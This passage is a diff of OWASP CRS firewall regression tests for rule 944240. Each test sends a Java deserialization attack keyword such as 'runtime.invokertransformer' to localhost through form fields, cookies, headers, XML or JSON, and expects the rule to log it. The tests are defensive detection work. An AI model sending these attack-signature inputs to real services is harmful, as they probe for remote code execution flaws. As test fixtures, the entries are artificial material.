"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_id: 20 desc: "Content-Type text/plain includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_id: 21 desc: "Content-Type application/json arg value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.forclosure\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.forclosure\"}" + output: + log_contains: "id \"944240\"" + - test_id: 22 desc: "Content-Type application/json arg name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.forclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.forclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 23 desc: "Argument test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_id: 24 desc: "Argument name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory=test" + output: + log_contains: "id \"944240\"" + - test_id: 25 desc: "Cookie test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 26 desc: "Cookie name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 27 desc: "Request header test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 28 desc: "XML attribute value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 29 desc: "XML element value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_id: 30 desc: "Nested XML element value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_id: 31 desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_id: 32 desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatefactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatefactory\"}" + output: + log_contains: "id \"944240\"" + - test_id: 33 desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 34 desc: "Argument test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 35 desc: "Argument name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer=test" + output: + log_contains: "id \"944240\"" + - test_id: 36 desc: "Cookie test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 37 desc: "Cookie name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 38 desc: "Request header test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 39 desc: "XML attribute value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 40 desc: "XML element value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 41 desc: "Nested XML element value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 42 desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 43 desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatetransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_id: 44 desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 45 desc: "Argument test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_id: 46 desc: "Argument name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer=test" + output: + log_contains: "id \"944240\"" + - test_id: 47 desc: "Cookie test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.invokertransformer - method: 